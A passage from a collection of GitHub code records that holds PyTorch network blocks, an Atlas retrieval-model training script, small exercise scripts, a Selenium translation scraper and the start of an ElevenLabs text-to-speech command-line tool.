Environment(loader=FileSystemLoader(str(seg_dir)))\n template = env.get_template(\"nnunet_code.py.jinja\")\n model_params = {\n \"input_dir\": input_dir,\n \"model_name\": model_name,\n \"mode\": mode,\n \"organ\": organ,\n \"organ_label\": organ_label,\n \"modality\": modality,\n \"region\": region,\n }\n code = template.render(\n header=st_read.notebook_header,\n notebook=True,\n **model_params,\n )\n notebook = st_read.to_notebook(code)\n\n st.write(\"\")\n col1, col2 = st.columns(2)\n with col1:\n run_jupyter = st.button(\"📂 Open in Jupyter Notebook\")\n with col2:\n st.download_button(\n \"📓 Download (.ipynb)\",\n notebook,\n \"segmentation.ipynb\",\n )\n if run_jupyter:\n with open(\"segmentation.ipynb\", \"w\") as f:\n f.write(notebook)\n subprocess.Popen([\"jupyter\", \"notebook\"])\n st.code(code)\n\n\nif __name__ == \"__main__\":\n show()\n","repo_name":"mahdeslami11/MRI-feilds-","sub_path":"autorad/webapp/pages/09_🫀_Automatic_segmentation.py","file_name":"09_🫀_Automatic_segmentation.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"14827158261","text":"\"\"\"Building block modules to use in network architecture\"\"\"\nfrom math import log2\nfrom collections import OrderedDict\nfrom typing import List\n\nimport torch\nimport torch.nn as nn\n\n\ndef make_mlp(\n dims: List, act: str, l_act: bool = False, bn: bool = True, dropout: float = 0.0\n):\n \"\"\"Create a simple MLP with batch-norm and dropout\n\n Args:\n dims: (List) a list containing the dimensions of MLP\n act: (str) activation function to be used. Valid activations are [relu, tanh, sigmoid]\n l_act: (bool) whether to use activation after the last linear layer\n bn: (bool) use batch-norm or not. Default is True\n dropout: (float) dropout percentage\n \"\"\"\n layers = []\n activation = {\n \"relu\": nn.ReLU(inplace=True),\n \"tanh\": nn.Tanh(),\n \"sigmoid\": nn.Sigmoid(),\n \"elu\": nn.ELU(),\n }[act.lower()]\n\n for i, (in_dim, out_dim) in enumerate(zip(dims[:-1], dims[1:])):\n layers.append(nn.Linear(in_dim, out_dim, bias=not bn))\n if i != (len(dims) - 2):\n if bn:\n layers.append(nn.BatchNorm1d(out_dim))\n\n layers.append(activation)\n\n if dropout > 0.0:\n layers.append(nn.Dropout(p=dropout))\n\n if l_act:\n layers.append(activation)\n\n return nn.Sequential(*layers)\n\n\ndef conv3(in_ch: int, out_ch: int, stride: int = 1) -> nn.Module:\n \"\"\"forward path in each layer with padding\"\"\"\n layer = nn.Sequential(\n nn.Conv2d(in_ch, out_ch, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_ch, out_ch, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n )\n\n return layer\n\n\nclass EfficientBlock(nn.Module):\n \"\"\"ECA block based on https://ieeexplore.ieee.org/document/9156697/\"\"\"\n\n def __init__(self, channels: int, gamma: int = 2, b: int = 1):\n super().__init__()\n t = int(abs((log2(channels) + b) / gamma))\n k = t if t % 2 else t + 1\n self.conv = nn.Conv1d(1, 1, kernel_size=k, padding=int(k / 2), bias=False)\n\n def forward(self, x):\n y = nn.functional.adaptive_avg_pool2d(x, 1)\n y = self.conv(y.squeeze(-1).transpose(-1, -2))\n y = y.transpose(-1, -2).unsqueeze(-1)\n y = torch.sigmoid(y)\n\n return x * y.expand_as(x)\n\n\nclass EfficientConvBlock(nn.Module):\n \"\"\"Two layer ECA conv block based on https://ieeexplore.ieee.org/document/9156697/\"\"\"\n\n def __init__(\n self, in_ch: int, out_ch: int, stride: int = 1, gamma: int = 2, b: int = 1\n ):\n super().__init__()\n self.layer1 = nn.Sequential(\n OrderedDict(\n [\n (\"eca1\", EfficientBlock(in_ch, gamma, b)),\n (\n \"conv1\",\n nn.Sequential(\n nn.Conv2d(\n in_ch,\n 64,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False,\n ),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n ),\n ]\n )\n )\n self.layer2 = nn.Sequential(\n OrderedDict(\n [\n (\"eca2\", EfficientBlock(64, gamma, b)),\n (\n \"conv2\",\n nn.Sequential(\n nn.Conv2d(\n 64,\n out_ch,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False,\n ),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n ),\n ),\n ]\n )\n )\n\n def forward(self, x):\n y = self.layer1(x)\n y = self.layer2(y)\n return y\n","repo_name":"mhnazeri/PMoE","sub_path":"PMoE/model/blocks/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71160756394","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function, division\nimport os\nfrom collections import Counter\n\n\nif __name__ == \"__main__\":\n with open(os.path.join('data', 'rosalind_maj.txt')) as dataset:\n results = []\n\n n, k = [int(r) for r in dataset.readline().strip().split()]\n for line in dataset:\n A = [int(r) for r in line.strip().split()]\n c = Counter(A)\n v, occ = c.most_common()[0]\n if occ > len(A) / 2:\n results.append(v)\n else:\n results.append(-1)\n print(*results)\n","repo_name":"luizirber/rosalind","sub_path":"maj.py","file_name":"maj.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43284877988","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.select import Select\nimport time\n\noptions = Options()\noptions.add_argument(\"--headless\")\ndriver = webdriver.Chrome('/Users/caoxiaojie/Downloads/chromedriver',options=options)\ndriver.get('https://www.bing.com/translator')\nsearch_query = driver.find_element_by_id('t_sv')\nprint(\"Enter the string\")\nstring = input()\nsearch_query.send_keys(string)\ntime.sleep(3)\n\nselect = Select(driver.find_element_by_id('t_sl'))\nselected_option = select.first_selected_option\ns = selected_option.text\nd = s.split()[0]\nprint(d)\n\ndriver.get('https://www.collinsdictionary.com/translator')\nselect_fr = Select(driver.find_element_by_id(\"select-input\"))\nselect_fr.select_by_value(d)\nsearch = driver.find_element_by_id('input-text')\nsearch.send_keys(string)\n\nselect_desire = Select(driver.find_element_by_id(\"select-output\"))\nalllang = driver.find_element_by_id(\"select-output\")\nprint(alllang.text)\nprint(\"Choose Your Language\")\nlang = input()\nselect_desire.select_by_value(lang)\n\n\n\ndriver.find_element_by_class_name('spinner').click()\n\nans = driver.find_element_by_id('output-text')\nprint(ans.text)\nmeaning = driver.find_elements_by_css_selector('.blocDefinition.page')\nfor mean in meaning:\n print(mean.text)","repo_name":"wzzlYwzzl/notebooks","sub_path":"Spider/翻译爬取举例/BingTranslate/BingTranslate.py","file_name":"BingTranslate.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"71546048554","text":"from pdb import set_trace\n\nclass Var():\n def __init__(self, val, parent=None):\n self.val = val\n\n def __add__(self, x):\n set_trace()\n y = Var(self.val + x.val, self)\n self.forward_der = 1\n x.forward_der = 1\n return y\n\n def __sub__(self, x):\n set_trace()\n y = Var(self.val - x.val, self)\n self.forward_der = 1\n x.forward_der = 1\n return y\n\n def __mul__(self, x):\n set_trace()\n y = Var(self.val * x.val, self)\n self.forward_der = x.val\n x.forward_der = self.val\n return y\n\n def __pow__(self, x):\n set_trace()\n y = Var(pow(self.val, x.val), self)\n self.forward_der = x.val * self.val\n return y\n\n\n#z = (w * x - y) ** 2 + w ** 2\nw, x, y = 1, 2, 3\n\nset_trace()\n\nW = Var(w)\nX = Var(x)\nY = Var(y)\n\nL0 = W * X\nL1 = L0 - Y\nL2 = L1 ** 2\nL3 = W ** 2\nL4 = L2 + L3\n","repo_name":"gov-ind/autograd","sub_path":"p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40137857658","text":"import math\n\nname_series = str(input())\nduration_episode = int(input())\nduration_break = int(input())\nduration_lunch = duration_break / 8\nduration_rest = duration_break / 4\nleft_time = duration_break - duration_lunch - duration_rest\nneeded_time = abs(left_time - duration_episode)\nif left_time >= duration_episode:\n print(f\"You have enough time to watch {name_series} and left with {math.ceil(needed_time)} \\\nminutes free time.\")\nelse:\n print(f\"You don't have enough time to watch {name_series}, you need {math.ceil(needed_time)} more \\\nminutes.\")\n","repo_name":"HristinaMateeva/software_engineering_path_softuni","sub_path":"01_programming_basics/02_exercises/02_exercise_conditional_statements/08_lunch_break.py","file_name":"08_lunch_break.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11840268160","text":"import os\nimport time\nfrom collections import defaultdict\nimport numpy as np\nimport torch\nimport torch.cuda\nimport logging\nfrom evaluate import evaluate\nfrom src import dist_utils, slurm, util\nfrom src.index_io import load_or_initialize_index, save_embeddings_and_index, load_subset_index\nfrom src.model_io import create_checkpoint_directories, load_or_initialize_atlas_model, save_atlas_model,load_or_initialize_atlas_model_forindex\nfrom src.options import get_options\nfrom src.tasks import get_task\n# import mlflow\n# import boto3\nimport time\nimport random\nfrom src.index import DistributedIndex\nimport pandas as pd\nimport torch.distributed as dist\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"true\"\nGRAD_SCALE_UPPER_BOUND_MEAN: int = 1000\nGRAD_SCALE_LOWER_BOUND_MEAN: float = 0.01\nTHRESHOLD_GRAD_STATS: int = 100\n\nlogger = logging.getLogger(__name__)\n\ndef train(\n model,\n index,\n passages,\n optimizer,\n scheduler,\n retr_optimizer,\n retr_scheduler,\n retr_graph_optimizer,\n retr_graph_scheduler,\n step,\n opt,\n checkpoint_path,\n):\n # logger.info(\"train function load\")\n tb_logger = util.init_tb_logger(os.path.join(\n opt.checkpoint_dir, opt.name), is_main=opt.is_main)\n run_stats = util.WeightedAvgStats()\n unwrapped_model = util.get_unwrapped_model_if_wrapped(model)\n # logger.info(\"model load\")\n # different seed for different sampling depending on global_rank\n # print(\"## rank\", opt.global_rank, opt.seed)\n \n ## edit by sai\n torch.manual_seed(opt.global_rank + random.randint(0, 50))\n # torch.manual_seed(opt.global_rank + opt.seed)\n\n scale = 2.0\n grad_stats = defaultdict(lambda: [])\n task = get_task(opt, unwrapped_model.reader_tokenizer)\n \n index_refresh_scheduler = util.IndexRefreshScheduler(\n opt.refresh_index, opt.freeze_retriever_steps, opt.train_retriever\n )\n # epoch_count = 0\n t1 = time.time()\n step_count = 0\n logger.info(f\"step at start:{step, step_count}\")\n # while step < opt.total_steps:\n while step < opt.total_steps:\n\n data_iterator = task.data_iterator(\n opt.train_data, opt.global_rank, opt.world_size, repeat_if_less_than_world_size=True, opt=opt\n )\n \n data_iterator = filter(None, map(task.process, data_iterator))\n data_iterator = task.batch_iterator(\n data_iterator, opt.per_gpu_batch_size, drop_last=True, shuffle=opt.shuffle)\n logger.info(f\"data iterator done:{opt.train_data}\")\n\n for i, batch in enumerate(data_iterator):\n t0 = time.time()\n # iter_stats = {}\n model.train()\n # logger.info(\"mod trn\")\n if not opt.use_file_passages and index_refresh_scheduler.is_time_to_refresh(step):\n # logger.info(\"refresh index inserted\")\n # Dont refresh index if just loaded it\n if not (step == 0 and opt.load_index_path is not None):\n indexing_start = time.time()\n \n unwrapped_model.build_index(\n index, passages, opt.per_gpu_embedder_batch_size, logger)\n \n # print(\"## rebuilt index\", time.time()-indexing_start )\n logger.info(f\"rebuilt index: {time.time()-indexing_start}\")\n # iter_stats[\"runtime/indexing\"] = (\n # time.time() - indexing_start, 1)\n\n if opt.save_index_path is not None:\n save_embeddings_and_index(index, opt)\n logger.info(\"save embds\")\n exit()\n # print(\"## saved index\", opt.save_index_n_shards)\n \n step += 1\n step_count += 1\n # train_step_start = time.time()\n # print(\"## indexin finished\")\n # print(\"## query \", len(batch[\"query\"]), batch[\"query\"][0] )\n\n # logger.info(\"step started\")\n # # queries = batch size that is passed to model\n \n reader_loss, retriever_loss, retriever_graph_loss = model(\n index=index,\n query=batch[\"query\"],\n target=batch[\"target\"],\n target_tokens=batch.get(\"target_tokens\"),\n passages=batch[\"passages\"] if opt.use_file_passages else None,\n batch_metadata=batch.get(\"metadata\"),\n filtering_fun=task.filter,\n train_retriever=opt.train_retriever and step > opt.freeze_retriever_steps,\n iter_stats={},\n # iter_stats=iter_stats,\n )\n # logger.info(\"step computed\")\n # print(\"## loss comp finished\", reader_loss,\n # retriever_loss, retriever_graph_loss)\n # wandb.log({\"reader loss\": reader_loss, \"retriever loss\": retriever_loss,\n # \"retreiver_graph loss\": retriever_graph_loss})\n # mlflow.log_metric(\"reader_loss\", reader_loss)\n # mlflow.log_metric(\"retriever_loss\", retriever_loss)\n # mlflow.log_metric(\"retreiver_graph_loss\", retriever_graph_loss)\n\n if retriever_loss is not None and opt.train_retriever and retriever_graph_loss is not None:\n train_loss = reader_loss.float() + retriever_loss + retriever_graph_loss\n elif retriever_loss is not None and opt.train_retriever:\n train_loss = reader_loss.float() + retriever_loss\n else:\n train_loss = reader_loss\n\n # iter_stats[\"loss/train_loss\"] = (train_loss.item(),\n # len(batch[\"query\"]))\n\n # backward_start = time.time()\n train_loss = scale * train_loss\n train_loss.backward()\n # iter_stats[\"runtime/backward\"] = (time.time() - backward_start, 1)\n\n # model_update_start = time.time()\n stats = util.compute_grad_stats(model)\n if stats[\"skip_example\"]:\n model.zero_grad()\n # continue\n else:\n for k, v in stats.items():\n grad_stats[k].append(v)\n\n if len(grad_stats[\"max\"]) >= THRESHOLD_GRAD_STATS:\n if np.mean(grad_stats[\"max\"]) > GRAD_SCALE_UPPER_BOUND_MEAN:\n scale /= 2\n elif np.mean(grad_stats[\"mean\"]) < GRAD_SCALE_LOWER_BOUND_MEAN:\n scale *= 2\n # print(f'Scale: {scale}')\n grad_stats.clear()\n\n if step % opt.accumulation_steps == 0 and not stats[\"skip_example\"]:\n if opt.is_distributed and opt.shard_optim:\n optimizer.clip_grad_norm(scale * opt.clip)\n if opt.train_retriever:\n retr_optimizer.clip_grad_norm(scale * opt.clip)\n if opt.train_retriever and retriever_graph_loss is not None:\n retr_graph_optimizer.clip_grad_norm(scale * opt.clip)\n else:\n torch.nn.utils.clip_grad_norm_(\n model.parameters(), scale * opt.clip)\n\n optimizer.step(scale=scale) # reader weights update\n scheduler.step()\n if opt.train_retriever:\n # retriever weights update\n retr_optimizer.step(scale=scale)\n retr_scheduler.step()\n if retriever_graph_loss is not None:\n retr_graph_optimizer.step(scale=scale)\n retr_graph_scheduler.step()\n\n model.zero_grad()\n # iter_stats[\"runtime/model_update\"] = (\n # time.time() - model_update_start, 1)\n # iter_stats[\"runtime/train_step\"] = (\n # time.time() - train_step_start, 1)\n # run_stats.update(iter_stats)\n\n # wandb.log({\"timeperstep\": time.time() - t0})\n # mlflow.log_metric(\"timeperstep\", time.time() - t0)\n\n # if step % opt.log_freq == 0:\n # log = f\"{step} / {opt.total_steps}\"\n # for k, v in sorted(run_stats.average_stats.items()):\n # log += f\" | {k}: {v:.3g}\"\n # if tb_logger:\n # tb_logger.add_scalar(k, v, step)\n # log += f\" | lr: {scheduler.get_last_lr()[0]:0.2g}\"\n # log += f\" | Memory: {torch.cuda.max_memory_allocated()//1e9} GiB\"\n # if tb_logger:\n # tb_logger.add_scalar(\n # \"lr\", scheduler.get_last_lr()[0], step)\n\n # logger.info(log)\n # run_stats.reset()\n\n if step % opt.eval_freq == 0:\n for data_path in opt.eval_data:\n dataset_name = os.path.basename(data_path)\n\n ##### call evaluate.py script ######\n metrics = evaluate(model, index, opt, data_path, step)\n log_message = f\"Dataset: {dataset_name}\"\n for k, v in metrics.items():\n log_message += f\" | {v:.3f} {k}\"\n if tb_logger:\n tb_logger.add_scalar(\n f\"{dataset_name}/{k}\", v, step)\n logger.info(log_message)\n\n if step % opt.save_freq == 0 and opt.is_main:\n save_atlas_model(\n unwrapped_model,\n optimizer,\n scheduler,\n retr_optimizer,\n retr_scheduler,\n step,\n opt,\n checkpoint_path,\n f\"step-{step}\",\n retr_graph_optimizer,\n retr_graph_scheduler,\n )\n # print(\"## step\", step)\n if step_count > 300:\n logger.info(f\"step, total time: {step,step_count, time.time() - t1}\")\n return\n # exit()\n\n # print(\"step\", i)\n # epoch_count = epoch_count + 1\n # print(\"step/epoch time\", time.time() - t0)\n\n\ndef _get_eval_data_iterator_forindexsel(opt, data_path, task):\n data_iterator = task.data_iterator(\n data_path, opt.global_rank, opt.world_size, opt=opt, is_eval=True)\n data_iterator = filter(None, map(task.process, data_iterator))\n ## edit by sai\n # data_iterator = list(task.batch_iterator(\n # data_iterator, opt.per_gpu_batch_size))\n data_iterator = list(task.batch_iterator(\n data_iterator, opt.per_gpu_batch_size_domainindex))\n\n if dist.is_initialized():\n len_data = torch.tensor(\n len(data_iterator), device=torch.device(\"cuda\"))\n dist.all_reduce(len_data, torch.distributed.ReduceOp.MAX)\n dist.barrier()\n if len(data_iterator) < len_data.item():\n data_iterator.extend(\n [{} for _ in range(len_data.item() - len(data_iterator))])\n\n return data_iterator\n\n## edit by sai\n## function to select domain index from the batch query\n@torch.no_grad()\ndef get_domainindex(model, opt, data_path, domain_wise_index_vec, domain_map_names):\n model.eval()\n # metrics = defaultdict(lambda: [])\n # dataset_wpred = []\n unwrapped_model = util.get_unwrapped_model_if_wrapped(model)\n reader_tokenizer = unwrapped_model.reader_tokenizer\n\n task = get_task(opt, reader_tokenizer)\n data_iterator = _get_eval_data_iterator_forindexsel(opt, data_path, task)\n\n for i, batch in enumerate(data_iterator):\n query = batch.get(\"query\", [\"\"])\n logger.info(f\"len query 0: {len(query),len(query[0])}\")\n # get only input\n query = [ele.split(\"###\")[3] for ele in query]\n # logger.info(f\"query shape:{len(query),query[0]}\")\n answers = batch.get(\"target\", [\"\"])\n # batch_metadata = batch.get(\"metadata\")\n target_tokens = batch.get(\"target_tokens\")\n query_enc, labels, decoder_input_ids = unwrapped_model.tokenize(\n query, answers, target_tokens=target_tokens)\n\n query_ids_retriever = query_enc[\"input_ids\"].cuda()\n query_mask_retriever = query_enc[\"attention_mask\"].cuda()\n\n logger.info(f\"len query: {len(query),len(query[0])}\")\n # logger.info(f\"query: {query[0]}\")\n # logger.info(f\"domain vec shape: {domain_wise_index_vec.shape}\")\n ## get batch query embedding vectors\n\n selected_domain_name = unwrapped_model.get_topdomain_index_name(\n query,\n query_ids_retriever,\n query_mask_retriever,\n domain_wise_index_vec,\n domain_map_names,\n opt.no_sel_indices\n )\n\n # If example is a padding example then skip step\n if (len(query) == 0) or (len(query[0]) == 0):\n continue\n \n break\n\n selected_domain_name = \",\".join(selected_domain_name)\n\n return selected_domain_name\n\nif __name__ == \"__main__\":\n options = get_options()\n opt = options.parse()\n\n torch.manual_seed(opt.seed)\n slurm.init_distributed_mode(opt)\n slurm.init_signal_handler()\n\n checkpoint_path, saved_index_path = create_checkpoint_directories(opt)\n\n logger = util.init_logger(\n opt.is_main, opt.is_distributed, os.path.join(checkpoint_path, \"run.log\"))\n if opt.is_main:\n options.print_options(opt)\n\n logger.info(f\"world size: {dist_utils.get_world_size()}\")\n\n ## edit by sai \n ## gen representing vector for each domain index \n if opt.gen_textdomain_representation_vec:\n for subset_textindex_name in opt.subset_textindex_name.split(\",\"):\n # logger.info(f\"subsetname: {subset_textindex_name}\")\n index = DistributedIndex()\n index.gen_representing_index(opt.load_index_path, opt.save_index_n_shards, opt.load_subset_textindex, subset_textindex_name)\n del index\n exit()\n \n # print(\"----index emb---\", index.embeddings.detach().cpu()[:, 0])\n # reader params: 247M, retriever: 108M, GNN:3M (3152896)\n\n model, optimizer, scheduler, retr_optimizer, retr_scheduler, opt, step, \\\n retr_graph_optimizer, retr_graph_scheduler = load_or_initialize_atlas_model(\n opt)\n\n # index, passages = load_or_initialize_index(opt)\n \n # print(sum(p.numel()\n # for p in model.retriever.parameters() if p.requires_grad))\n # print(sum(p.numel()\n # for p in model.reader.parameters() if p.requires_grad))\n # print(sum(p.numel()\n # for p in model.retriever_graph.parameters() if p.requires_grad))\n\n if opt.is_distributed:\n if opt.shard_grads:\n import fairscale.nn.data_parallel\n\n model.reader = fairscale.nn.data_parallel.ShardedDataParallel(\n model.reader, optimizer, auto_refresh_trainable=False\n )\n if opt.train_retriever:\n model.retriever = fairscale.nn.data_parallel.ShardedDataParallel(\n model.retriever, retr_optimizer, auto_refresh_trainable=False\n )\n if opt.train_retriever & opt.retrieve_with_rerank_bygraph:\n model.retriever_graph = fairscale.nn.data_parallel.ShardedDataParallel(\n model.retriever_graph, retr_graph_optimizer, auto_refresh_trainable=False\n )\n # model.retriever = fairscale.nn.data_parallel.ShardedDataParallel(\n # model.retriever, retr_optimizer, retr_graph_optimizer, auto_refresh_trainable=False\n # )\n else:\n model = torch.nn.parallel.DistributedDataParallel(\n model,\n device_ids=[opt.local_rank],\n output_device=opt.local_rank,\n find_unused_parameters=True,\n )\n model._set_static_graph()\n\n logger.info(\"Start training\")\n dist_utils.barrier()\n logger.info(\"call training\")\n\n # load domain representing vector\n domain_map_names = {\n 0: \"Art\",\n 1: \"Geography\",\n 2: \"History\",\n 3: \"Sociology\",\n 4: \"Philosophy\",\n 5: \"Political-Science\",\n 6: \"Psychology\",\n 7: \"Business\",\n 8: \"Economics\",\n 9: \"Geology\",\n 10: \"Bio-1\",\n 11: \"Mathematics\",\n 12: \"Computer-Science\",\n 13: \"Environmental-Science\",\n 14: \"Engineering\",\n 15: \"Materials-Science\",\n 16: \"Bio-2\",\n 17: \"Physics\",\n 18: \"Chemistry\",\n 19: \"Med-1\",\n 20: \"Med-2\",\n 21: \"Med-3\",\n 22: \"Med-4\"\n }\n\n domain_list = ['Art','History', 'Sociology', \n 'Philosophy', 'Political-Science','Psychology', \n 'Geology', 'Mathematics','Engineering','Economics',\n 'Computer-Science', 'Environmental-Science','Business',\n 'Materials-Science', 'Biology', 'Physics','Chemistry',\n 'Medicine','Materials science','Political science','Law']\n \n domain_vector_list = [torch.load(opt.load_index_path+domain_map_names[ele]+\"/mean_emb.pt\") for ele in range(len(domain_map_names))]\n domain_wise_index_vec = torch.cat(domain_vector_list, dim=1)\n logger.info(f\"domain_wise_index_vec mean {torch.mean(domain_wise_index_vec,dim=0)}\") \n \n ## edit by sai ##\n ## load data and group by topic ##\n df = pd.read_json(opt.train_data[0], lines=True)\n\n df = df.loc[df['target'].isin(domain_list)]\n grouped = df.groupby(['target'])\n logger.info(f\"groupby size: {grouped.size(), len(grouped),opt.train_data}\")\n\n ## load index models\n index_model, _, _, _, _, _, _, _, _ = load_or_initialize_atlas_model_forindex(opt, eval_only=True)\n \n ## loop for repeatation\n for count_iteration in range(2):\n logger.info(f\"IYERATION:{count_iteration}\")\n\n ## loop for each dataset\n for name,group in grouped:\n\n data_path = os.path.dirname(opt.train_data[0])+\"/instructions_sample_\" + name[0] + \".jsonl\"\n \n if not os.path.exists(data_path):\n group.to_json(data_path, orient='records', lines=True)\n\n # for data_path in [eval_file]: #TODO change loop variable for multiple eval files\n dataset_name = os.path.basename(data_path) \n logger.info(f\"Start Evaluation on {data_path}\")\n\n try:\n selected_domain_name = get_domainindex(index_model, opt, data_path, domain_wise_index_vec, domain_map_names)\n logger.info(f\"sel domain index {selected_domain_name}\")\n\n ## load selected index \n index, passages = load_subset_index(opt, selected_domain_name)\n \n opt.train_data = [data_path]\n\n train(\n model,\n index,\n passages,\n optimizer,\n scheduler,\n retr_optimizer,\n retr_scheduler,\n retr_graph_optimizer,\n retr_graph_scheduler,\n step,\n opt,\n checkpoint_path,\n )\n except:\n logger.info(f\"break Evaluation on {data_path}\")\n continue\n step = step+300\n\n# mlflow.end_run()","repo_name":"pnnl/EXPERT2","sub_path":"model/custom_train_adapretr.py","file_name":"custom_train_adapretr.py","file_ext":"py","file_size_in_byte":19268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3810962477","text":"import argparse\nimport io\nimport os\nimport sys\nimport subprocess\nimport requests\nimport xml.etree.ElementTree as ET\nimport sys\nfrom bs4 import BeautifulSoup\nimport re\nimport json\nfrom tabulate import tabulate\n# Supress unncessary pygame prompt\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\n\ndef is_tool(name):\n \"\"\"Check whether `name` is on PATH.\"\"\"\n\n from shutil import which\n\n return which(name) is not None\n\ndef get_voices(api_key):\n url = \"https://api.elevenlabs.io/v1/voices\"\n headers = {\"xi-api-key\": api_key}\n response = requests.get(url, headers=headers)\n\n if response.status_code == 200:\n data = response.json()\n voices = data[\"voices\"]\n table_data = [\n [\n voice[\"voice_id\"],\n voice[\"name\"],\n voice[\"category\"],\n ]\n for voice in voices\n ]\n print(tabulate(table_data, headers=[\"Voice ID\", \"Name\", \"Category\"]))\n else:\n print(f\"Error: {response.text}\")\n\n\n\n\ndef url_to_text(url):\n response = requests.get(url)\n soup = BeautifulSoup(response.content, 'html.parser')\n article = soup.find('article')\n\n # Remove unnecessary sections\n for section in article.find_all(['aside', 'header', 'footer', 'figure', 'figcaption', 'nav', 'script']):\n section.decompose()\n\n # Remove hyperlinks and images from the article\n for link in article.find_all('a'):\n link.decompose()\n for img in article.find_all('img'):\n img.decompose()\n\n # Extract the text from the article\n text = article.get_text(separator=' ')\n\n # Remove unwanted characters and normalize whitespace\n text = re.sub(r'[\\n]+', '\\n', text)\n text = re.sub(r'[/;:]', '', text)\n text = re.sub(r'\\d{4}', '', text)\n text = re.sub(r'[\\n]*\\w*Comments[\\n]*', '', text)\n text = re.sub(r'(\\n\\s*)+\\n+', '\\n\\n', text).strip()\n text = re.sub(r' +', ' ', text)\n text = re.sub(r' ?([.,?!])', r'\\1', text)\n\n # Remove other unwanted patterns\n text = re.sub(r'Listen\\s+\\d+\\s+min.*Share', '', text)\n text = re.sub(r'Most Popular', '', text)\n text = re.sub(r'From our sponsor', '', text)\n\n return text\n\ndef play_audio(voice_id, api_key, text, endpoint, audio_file_name):\n \"\"\"Plays audio by making a TTS API request.\n\n Args:\n voice_id: The ID of the voice to use.\n api_key: The API key to authenticate the request.\n text: The text to convert to speech.\n endpoint: The TTS API endpoint to use.\n audio_file_name: The name of the audio file to be created\n \"\"\"\n\n api_endpoint = f\"https://api.elevenlabs.io/v1/text-to-speech/{voice_id}\"\n if endpoint == \"stream\":\n api_endpoint += \"/stream\"\n\n headers = {\n \"xi-api-key\": api_key\n }\n data = {\n \"text\": text\n }\n\n response = requests.post(api_endpoint, headers=headers, json=data)\n\n if response.status_code == 200:\n if endpoint == \"stream\":\n pygame.init() # To use a custom sound device, use pygame.mixer.init(devicename='name_of_device') here\n sound = pygame.mixer.Sound(io.BytesIO(response.content))\n sound.play()\n while pygame.mixer.get_busy():\n pygame.time.wait(100)\n else:\n with open(audio_file_name, \"wb\") as f:\n f.write(response.content)\n if os.name == 'nt': # If on Windows, use Windows Media Player\n subprocess.call([\"wmplayer\", \"/play\", \"/close\", audio_file_name])\n elif sys.platform == 'darwin': # If on Mac, use afplay\n subprocess.call([\"afplay\", audio_file_name])\n elif sys.platform == 'linux': # If on Linux, use aplay\n subprocess.call([\"mpv\", audio_file_name])\n else:\n print(f\"Unsupported platform: {os.name}\")\n else:\n print(f\"Error: {response.text}\")\n\ndef get_news_by_category(category):\n \"\"\"Returns the news for the given category by parsing an RSS feed.\n\n Args:\n category: The name of the category to retrieve news for.\n\n Returns:\n The concatenated titles and descriptions of the news articles.\n \"\"\"\n categories = {\n \"ai\": \"https://www.wired.com/feed/tag/ai/latest/rss\",\n \"gear\": \"https://www.wired.com/feed/category/gear/latest/rss\",\n \"business\": \"https://www.wired.com/feed/category/business/latest/rss\",\n \"culture\": \"https://www.wired.com/feed/category/culture/latest/rss\",\n \"science\": \"https://www.wired.com/feed/category/science/latest/rss\",\n \"security\": \"https://www.wired.com/feed/category/security/latest/rss\",\n }\n url = categories.get(category)\n if not url:\n return None\n\n response = requests.get(url)\n root = ET.fromstring(response.content)\n news_articles = root.findall(\".//item\")\n text = \"\"\n for article in news_articles:\n title = article.find(\"title\").text\n description = article.find(\"description\").text\n text += f\"{title}\\n{description}\\n\\n\"\n\n return text\n\n# Check if required playback tools on linux are installed\nif sys.platform == 'linux' and not is_tool('mpv'):\n print(\"\\n'mpv' is not installed. Please install it to continue.\\n\")\n print(\"\\033[1m sudo apt install mpv\\n\\033[0m\")\n sys.exit(1)\n\nparser = argparse.ArgumentParser()\ngroup1 = parser.add_mutually_exclusive_group(required=True)\ngroup1.add_argument(\"-a\", \"--audio\", help=\"Use /v1/text-to-speech API endpoint\", action=\"store_const\", dest=\"endpoint\", const=\"audio\")\ngroup1.add_argument(\"-s\", \"--stream\", help=\"Use /v1/text-to-speech/{voice_id}/stream API endpoint\", action=\"store_const\", dest=\"endpoint\", const=\"stream\")\ngroup1.add_argument(\"--get-voices\", help=\"Retrieve the available voices\", action=\"store_true\")\n\nparser.add_argument(\"-v\", \"--voice-id\", help=\"The ID of the voice to use\")\n\ngroup2 = parser.add_mutually_exclusive_group(required=False)\ngroup2.add_argument(\"-t\", \"--text\", help=\"The text to convert to speech\")\ngroup2.add_argument(\"-f\", \"--file\", help=\"Text file to convert to speech\")\ngroup2.add_argument(\"-u\", \"--url\", help=\"BETA: URL of article to convert to speech\")\ngroup2.add_argument(\"--ai\", help=\"Read the latest AI news\", action=\"store_const\", dest=\"category\", const=\"ai\")\ngroup2.add_argument(\"--gear\", help=\"Read the latest gear 